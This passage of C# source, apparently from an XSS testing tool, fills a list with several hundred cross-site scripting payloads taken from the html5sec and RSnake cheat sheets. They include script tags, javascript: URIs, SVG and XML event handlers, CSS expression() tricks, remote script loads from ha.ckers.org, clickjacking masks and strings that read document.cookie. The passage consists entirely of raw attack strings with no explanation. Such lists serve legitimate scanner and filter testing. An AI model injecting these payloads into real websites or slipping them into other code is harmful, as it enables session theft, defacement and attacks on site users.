                payloads.Add(new XSSPayload() { Payload = "<div style='background:url(test5.svg)'>PRESS ENTER</div>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='91'>[A]"});
                payloads.Add(new XSSPayload() { Payload = "<? foo='><script>alert(91)</script>'>"});
                payloads.Add(new XSSPayload() { Payload = "<! foo='><script>alert(91)</script>'>"});
                payloads.Add(new XSSPayload() { Payload = "</ foo='><script>alert(91)</script>'>"});
                payloads.Add(new XSSPayload() { Payload = "[B]"});
                payloads.Add(new XSSPayload() { Payload = "<? foo='><x foo='?><script>alert(91)</script>'>'>"});
                payloads.Add(new XSSPayload() { Payload = "[C]"});
                payloads.Add(new XSSPayload() { Payload = "<! foo='[[[x]]'><x foo=']foo><script>alert(91)</script>'>"});
                payloads.Add(new XSSPayload() { Payload = "[D]"});
                payloads.Add(new XSSPayload() { Payload = "<% foo><x foo='%><script>alert(91)</script>'>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='92'><div style='background:url(http://foo.f/f oo/;color:red/*/foo.jpg);'>X</div>//[''`-->]]>]</div><div id='93'><div style='list-style:url(http://foo.f)\\20url(javascript:alert(93));'>X</div>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='94'><svg xmlns='http://www.w3.org/2000/svg'>"});
                payloads.Add(new XSSPayload() { Payload = "<handler xmlns:ev='http://www.w3.org/2001/xml-events' ev:event='load'>alert(94)</handler>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='95'><svg xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'>"});
                payloads.Add(new XSSPayload() { Payload = "<feImage>"});
                payloads.Add(new XSSPayload() { Payload = "<set attributeName='xlink:href' to='data:image/svg+xml;charset=utf-8;base64,"});
                payloads.Add(new XSSPayload() { Payload = "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D'/>"});
                payloads.Add(new XSSPayload() { Payload = "</feImage>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='96'><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='97'><!-- IE 5-9 -->"});
                payloads.Add(new XSSPayload() { Payload = "<div id=d><x xmlns='><iframe onload=alert(97)'></div>"});
                payloads.Add(new XSSPayload() { Payload = "<script>d.innerHTML+='';</script>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!-- IE 10 in IE5-9 Standards mode -->"});
                payloads.Add(new XSSPayload() { Payload = "<div id=d><x xmlns=''><iframe onload=alert(2)//'></div>"});
                payloads.Add(new XSSPayload() { Payload = "<script>d.innerHTML+='';</script>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='98'><div id=d><div style='font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B''>X</div></div>"});
                payloads.Add(new XSSPayload() { Payload = "<script>with(document.getElementById('d'))innerHTML=innerHTML</script>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='99'>XXX<style>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!--"});
                payloads.Add(new XSSPayload() { Payload = "--><!--*{color:red}   /* all UA */"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "</style>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='100'><img[a][b]src=x[d]onerror[c]=[e]'alert(100)'>//[''`-->]]>]</div><div id='101'><a href='[a]java[b]script[c]:alert(101)'>XXX</a>//[''`-->]]>]</div><div id='102'><img src='x` `<script>alert(102)</script>'` `>//[''`-->]]>]</div><div id='103'><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='104'><svg xmlns='http://www.w3.org/2000/svg' id='foo'>"});
                payloads.Add(new XSSPayload() { Payload = "<x xmlns='http://www.w3.org/2001/xml-events' event='load' observer='foo' handler='data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar'/>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='105'><iframe src='data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03'></iframe>//[''`-->]]>]</div><div id='106'><img src onerror /' ''= alt=alert(106)//'>//[''`-->]]>]</div><div id='107'><title onpropertychange=alert(107)></title><title title=></title>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='108'><!-- IE 5-8 standards mode -->"});
                payloads.Add(new XSSPayload() { Payload = "<a href=http://foo.bar/#x=`y></a><img alt='`><img src=xx:x onerror=alert(108)></a>'>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!-- IE 5-9 standards mode -->"});
                payloads.Add(new XSSPayload() { Payload = "<!a foo=x=`y><img alt='`><img src=xx:x onerror=alert(2)//'>"});
                payloads.Add(new XSSPayload() { Payload = "<?a foo=x=`y><img alt='`><img src=xx:x onerror=alert(3)//'>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='109'><svg xmlns='http://www.w3.org/2000/svg'>"});
                payloads.Add(new XSSPayload() { Payload = "<a id='x'><rect fill='white' width='1000' height='1000'/></a>"});
                payloads.Add(new XSSPayload() { Payload = "<rect  fill='white' style='clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);'/>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='110'><svg xmlns='http://www.w3.org/2000/svg'>"});
                payloads.Add(new XSSPayload() { Payload = "<path d='M0,0' style='marker-start:url(test4.svg#a)'/>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='111'><div style='background:url(/f#[a]oo/;color:red/*/foo.jpg);'>X</div>//[''`-->]]>]</div><div id='112'><div style='font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);'>X</div>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='113'><div id='x'>XXX</div>"});
                payloads.Add(new XSSPayload() { Payload = "<style>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "#x{font-family:foo[bar;color:green;}"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "#y];color:red;{}"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "</style>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='114'><x style='background:url('x[a];color:red;/*')'>XXX</x>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='115'><!--[if]><script>alert(115)</script -->"});
                payloads.Add(new XSSPayload() { Payload = "<!--[if<img src=x onerror=alert(2)//]> -->//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='116'><div id='x'>x</div>"});
                payloads.Add(new XSSPayload() { Payload = "<xml:namespace prefix='t'>"});
                payloads.Add(new XSSPayload() { Payload = "<import namespace='t' implementation='#default#time2'>"});
                payloads.Add(new XSSPayload() { Payload = "<t:set attributeName='innerHTML' targetElement='x' to='&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;'>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='117'><a href='http://attacker.org'>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src='http://example.org/'></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "</a>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='118'><div draggable='true' ondragstart='event.dataTransfer.setData('text/plain','malicious code');'>"});
                payloads.Add(new XSSPayload() { Payload = "<h1>Drop me</h1>"});
                payloads.Add(new XSSPayload() { Payload = "</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<iframe src='http://www.example.org/dropHere.html'></iframe>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='119'><iframe src='view-source:http://www.example.org/' frameborder='0' style='width:400px;height:180px'></iframe>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<textarea type='text' cols='50' rows='10'></textarea>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='120'><script>"});
                payloads.Add(new XSSPayload() { Payload = "function makePopups(){"});
                payloads.Add(new XSSPayload() { Payload = "for (i=1;i<6;i++) {"});
                payloads.Add(new XSSPayload() { Payload = "window.open('popup.html','spam'+i,'width=50,height=50');"});
                payloads.Add(new XSSPayload() { Payload = "}"});
                payloads.Add(new XSSPayload() { Payload = "}"});
                payloads.Add(new XSSPayload() { Payload = "</script>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<body>"});
                payloads.Add(new XSSPayload() { Payload = "<a href='#' onclick='makePopups()'>Spam</a>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='121'><html xmlns='http://www.w3.org/1999/xhtml'"});
                payloads.Add(new XSSPayload() { Payload = "xmlns:svg='http://www.w3.org/2000/svg'>"});
                payloads.Add(new XSSPayload() { Payload = "<body style='background:gray'>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src='http://example.com/' style='width:800px; height:350px; border:none; mask: url(#maskForClickjacking);'/>"});
                payloads.Add(new XSSPayload() { Payload = "<svg:svg>"});
                payloads.Add(new XSSPayload() { Payload = "<svg:mask id='maskForClickjacking' maskUnits='objectBoundingBox' maskContentUnits='objectBoundingBox'>"});
                payloads.Add(new XSSPayload() { Payload = "<svg:rect x='0.0' y='0.0' width='0.373' height='0.3' fill='white'/>"});
                payloads.Add(new XSSPayload() { Payload = "<svg:circle cx='0.45' cy='0.7' r='0.075' fill='white'/>"});
                payloads.Add(new XSSPayload() { Payload = "</svg:mask>"});
                payloads.Add(new XSSPayload() { Payload = "</svg:svg>"});
                payloads.Add(new XSSPayload() { Payload = "</body>"});
                payloads.Add(new XSSPayload() { Payload = "</html>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='122'><iframe sandbox='allow-same-origin allow-forms allow-scripts' src='http://example.org/'></iframe>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='123'><span class=foo>Some text</span>"});
                payloads.Add(new XSSPayload() { Payload = "<a class=bar href='http://www.example.org'>www.example.org</a>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<script src='http://code.jquery.com/jquery-1.4.4.js'></script>"});
                payloads.Add(new XSSPayload() { Payload = "<script>"});
                payloads.Add(new XSSPayload() { Payload = "$('span.foo').click(function() {"});
                payloads.Add(new XSSPayload() { Payload = "alert('foo');"});
                payloads.Add(new XSSPayload() { Payload = "$('a.bar').click();"});
                payloads.Add(new XSSPayload() { Payload = "});"});
                payloads.Add(new XSSPayload() { Payload = "$('a.bar').click(function() {"});
                payloads.Add(new XSSPayload() { Payload = "alert('bar');"});
                payloads.Add(new XSSPayload() { Payload = "location='http://html5sec.org';"});
                payloads.Add(new XSSPayload() { Payload = "});"});
                payloads.Add(new XSSPayload() { Payload = "</script>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='124'><script src='/\\example.com\foo.js'></script> // Safari 5.0, Chrome 9, 10"});
                payloads.Add(new XSSPayload() { Payload = "<script src='\\example.com\foo.js'></script> // Safari 5.0//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='125'><?xml version='1.0'?>"});
                payloads.Add(new XSSPayload() { Payload = "<?xml-stylesheet type='text/xml' href='#stylesheet'?>"});
                payloads.Add(new XSSPayload() { Payload = "<!DOCTYPE doc [<!ATTLIST xsl:stylesheet id    ID    #REQUIRED>]>"});
                payloads.Add(new XSSPayload() { Payload = "<svg xmlns='http://www.w3.org/2000/svg'>"});
                payloads.Add(new XSSPayload() { Payload = "<xsl:stylesheet id='stylesheet' version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform'>"});
                payloads.Add(new XSSPayload() { Payload = "<xsl:template match='/'>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe xmlns='http://www.w3.org/1999/xhtml' src='javascript:alert(125)'></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "</xsl:template>"});
                payloads.Add(new XSSPayload() { Payload = "</xsl:stylesheet>"});
                payloads.Add(new XSSPayload() { Payload = "<circle fill='red' r='40'></circle>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='126'><object id='x' classid='clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598'></object>"});
                payloads.Add(new XSSPayload() { Payload = "<object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' onqt_error='alert(126)' style='behavior:url(#x);'><param name=postdomevents /></object>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='127'><svg xmlns='http://www.w3.org/2000/svg' id='x'>"});
                payloads.Add(new XSSPayload() { Payload = "<listener event='load' handler='#y' xmlns='http://www.w3.org/2001/xml-events' observer='x'/>"});
                payloads.Add(new XSSPayload() { Payload = "<handler id='y'>alert(127)</handler>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='128'><svg><style>&lt;img/src=x onerror=alert(128)// </b>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='129'><svg>"});
                payloads.Add(new XSSPayload() { Payload = "<image style='filter:url('data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>')'>"});
                payloads.Add(new XSSPayload() { Payload = "<!--"});
                payloads.Add(new XSSPayload() { Payload = "Same effect with"});
                payloads.Add(new XSSPayload() { Payload = "<image filter='...'>"});
                payloads.Add(new XSSPayload() { Payload = "-->"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='130'><math href='javascript:alert(130)'>CLICKME</math>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<math>"});
                payloads.Add(new XSSPayload() { Payload = "<!-- up to FF 13 -->"});
                payloads.Add(new XSSPayload() { Payload = "<maction actiontype='statusline#http://google.com' xlink:href='javascript:alert(2)'>CLICKME</maction>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!-- FF 14+ -->"});
                payloads.Add(new XSSPayload() { Payload = "<maction actiontype='statusline' xlink:href='javascript:alert(3)'>CLICKME<mtext>http://http://google.com</mtext></maction>"});
                payloads.Add(new XSSPayload() { Payload = "</math>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='131'><b>drag and drop one of the following strings to the drop box:</b>"});
                payloads.Add(new XSSPayload() { Payload = "<br/><hr/>"});
                payloads.Add(new XSSPayload() { Payload = "jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//"});
                payloads.Add(new XSSPayload() { Payload = "<br/><hr/>"});
                payloads.Add(new XSSPayload() { Payload = "feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//"});
                payloads.Add(new XSSPayload() { Payload = "<br/><hr/>"});
                payloads.Add(new XSSPayload() { Payload = "feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b>"});
                payloads.Add(new XSSPayload() { Payload = "<br/><hr/>"});
                payloads.Add(new XSSPayload() { Payload = "feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//"});
                payloads.Add(new XSSPayload() { Payload = "<br/><hr/>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='dropbox' style='height: 360px;width: 500px;border: 5px solid #000;position: relative;' ondragover='event.preventDefault()'>+ Drop Box +</div>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='132'><!doctype html>"});
                payloads.Add(new XSSPayload() { Payload = "<form>"});
                payloads.Add(new XSSPayload() { Payload = "<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>"});
                payloads.Add(new XSSPayload() { Payload = "<br>"});
                payloads.Add(new XSSPayload() { Payload = "<input name='secret' type='password'>"});
                payloads.Add(new XSSPayload() { Payload = "</form>"});
                payloads.Add(new XSSPayload() { Payload = "<!-- injection --><svg height='50px'>"});
                payloads.Add(new XSSPayload() { Payload = "<image xmlns:xlink='http://www.w3.org/1999/xlink'>"});
                payloads.Add(new XSSPayload() { Payload = "<set attributeName='xlink:href' begin='accessKey(a)' to='//example.com/?a' />"});
                payloads.Add(new XSSPayload() { Payload = "<set attributeName='xlink:href' begin='accessKey(b)' to='//example.com/?b' />"});
                payloads.Add(new XSSPayload() { Payload = "<set attributeName='xlink:href' begin='accessKey(c)' to='//example.com/?c' />"});
                payloads.Add(new XSSPayload() { Payload = "<set attributeName='xlink:href' begin='accessKey(d)' to='//example.com/?d' />"});
                payloads.Add(new XSSPayload() { Payload = "</image>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='133'><!-- `<img/src=xx:xx onerror=alert(133)//--!>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='134'><xmp>"});
                payloads.Add(new XSSPayload() { Payload = "<%"});
                payloads.Add(new XSSPayload() { Payload = "</xmp>"});
                payloads.Add(new XSSPayload() { Payload = "<img alt='%></xmp><img src=xx:x onerror=alert(134)//'>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<script>"});
                payloads.Add(new XSSPayload() { Payload = "x='<%'"});
                payloads.Add(new XSSPayload() { Payload = "</script> %>/"});
                payloads.Add(new XSSPayload() { Payload = "alert(2)"});
                payloads.Add(new XSSPayload() { Payload = "</script>"});
                payloads.Add(new XSSPayload() { Payload = "<style>"});
                payloads.Add(new XSSPayload() { Payload = "*['<!--']{}"});
                payloads.Add(new XSSPayload() { Payload = "</style>"});
                payloads.Add(new XSSPayload() { Payload = "-->{}"});
                payloads.Add(new XSSPayload() { Payload = "*{color:red}</style>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='135'><?xml-stylesheet type='text/xsl' href='#' ?>"});
                payloads.Add(new XSSPayload() { Payload = "<stylesheet xmlns='http://www.w3.org/TR/WD-xsl'>"});
                payloads.Add(new XSSPayload() { Payload = "<template match='/'>"});
                payloads.Add(new XSSPayload() { Payload = "<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>"});
                payloads.Add(new XSSPayload() { Payload = "<if expr='new ActiveXObject('htmlfile').parentWindow.alert(2)'></if>"});
                payloads.Add(new XSSPayload() { Payload = "</template>"});
                payloads.Add(new XSSPayload() { Payload = "</stylesheet>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='136'><form action='' method='post'>"});
                payloads.Add(new XSSPayload() { Payload = "<input name='username' value='admin' />"});
                payloads.Add(new XSSPayload() { Payload = "<input name='password' type='password' value='secret' />"});
                payloads.Add(new XSSPayload() { Payload = "<input name='injected' value='injected' dirname='password' />"});
                payloads.Add(new XSSPayload() { Payload = "<input type='submit'>"});
                payloads.Add(new XSSPayload() { Payload = "</form>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='137'><svg>"});
                payloads.Add(new XSSPayload() { Payload = "<a xmlns:xlink='http://www.w3.org/1999/xlink' xlink:href='?'>"});
                payloads.Add(new XSSPayload() { Payload = "<circle r='400'></circle>"});
                payloads.Add(new XSSPayload() { Payload = "<animate attributeName='xlink:href' begin='0' from='javascript:alert(137)' to='&' />"});
                payloads.Add(new XSSPayload() { Payload = "</a>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='138'><link rel='import' href='test.svg' />//[''`-->]]>]</div><div id='139'><iframe srcdoc='&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;' />//[''`-->]]>]</div>undefined"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT>alert('XSS');</SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "'';!--'<XSS>=&{()}"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='javascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=javascript:alert('XSS')>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=JaVaScRiPt:alert('XSS')>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=javascript:alert(&quot;XSS&quot;)>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=`javascript:alert('RSnake says, 'XSS'')`>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"});
                payloads.Add(new XSSPayload() { Payload = "SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='jav	ascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='jav&#x09;ascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='jav&#x0A;ascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='jav&#x0D;ascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC=' &#14;  javascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT/XSS SRC='http://ha.ckers.org/xss.js'></SCRIPT>"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='javascript:alert('XSS')'"});
                payloads.Add(new XSSPayload() { Payload = "<SCRIPT>a=/XSS/"});
                payloads.Add(new XSSPayload() { Payload = "\';alert('XSS');//"});
                payloads.Add(new XSSPayload() { Payload = "<INPUT TYPE='IMAGE' SRC='javascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<BODY BACKGROUND='javascript:alert('XSS')'>"});
                payloads.Add(new XSSPayload() { Payload = "<BODY ONLOAD=alert('XSS')>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG DYNSRC='javascript:alert('XSS')'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG LOWSRC='javascript:alert('XSS')'>"});
                payloads.Add(new XSSPayload() { Payload = "<BGSOUND SRC='javascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<BR SIZE='&{alert('XSS')}'>"});
                payloads.Add(new XSSPayload() { Payload = "<LAYER SRC='http://ha.ckers.org/scriptlet.html'></LAYER>"});
                payloads.Add(new XSSPayload() { Payload = "<LINK REL='stylesheet' HREF='javascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<LINK REL='stylesheet' HREF='http://ha.ckers.org/xss.css'>"});
                payloads.Add(new XSSPayload() { Payload = "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>"});
                payloads.Add(new XSSPayload() { Payload = "<META HTTP-EQUIV='Link' Content='<http://ha.ckers.org/xss.css>; REL=stylesheet'>"});
                payloads.Add(new XSSPayload() { Payload = "<STYLE>BODY{-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')}</STYLE>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='vbscript:msgbox('XSS')'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='mocha:[code]'>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG SRC='livescript:[code]'>"});
                payloads.Add(new XSSPayload() { Payload = "<META HTTP-EQUIV='refresh' CONTENT='0;url=javascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<META HTTP-EQUIV='refresh' CONTENT='0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K'>"});
                payloads.Add(new XSSPayload() { Payload = "<META HTTP-EQUIV='Link' Content='<javascript:alert('XSS')>; REL=stylesheet'>"});
                payloads.Add(new XSSPayload() { Payload = "<META HTTP-EQUIV='refresh' CONTENT='0; URL=http://;URL=javascript:alert('XSS');'>"});
                payloads.Add(new XSSPayload() { Payload = "<IFRAME SRC='javascript:alert('XSS');'></IFRAME>"});
                payloads.Add(new XSSPayload() { Payload = "<FRAMESET><FRAME SRC='javascript:alert('XSS');'></FRAMESET>"});
                payloads.Add(new XSSPayload() { Payload = "<TABLE BACKGROUND='javascript:alert('XSS')'>"});
                payloads.Add(new XSSPayload() { Payload = "<DIV STYLE='background-image: url(javascript:alert('XSS'))'>"});
                payloads.Add(new XSSPayload() { Payload = "<DIV STYLE='background-image: url(&#1;javascript:alert('XSS'))'>"});
                payloads.Add(new XSSPayload() { Payload = "<DIV STYLE='width: expression(alert('XSS'));'>"});
                payloads.Add(new XSSPayload() { Payload = "<STYLE>@im\\port'\\ja\vasc\ript:alert('XSS')';</STYLE>"});
                payloads.Add(new XSSPayload() { Payload = "<IMG STYLE='xss:expr/*XSS*/ession(alert('XSS'))'>"});
                payloads.Add(new XSSPayload() { Payload = "<XSS STYLE='xss:expression(alert('XSS'))'>"});
                payloads.Add(new XSSPayload() { Payload = "exp/*<XSS STYLE='no\\xss:noxss('*//*');"});
                payloads.Add(new XSSPayload() { Payload = "<STYLE TYPE='text/javascript'>alert('XSS');</STYLE>"});
                payloads.Add(new XSSPayload() { Payload = "<STYLE>.XSS{background-image:url('javascript:alert('XSS')');}</STYLE><A CLASS=XSS></A>"});
                payloads.Add(new XSSPayload() { Payload = "<STYLE type='text/css'>BODY{background:url('javascript:alert('XSS')')}</STYLE>"});
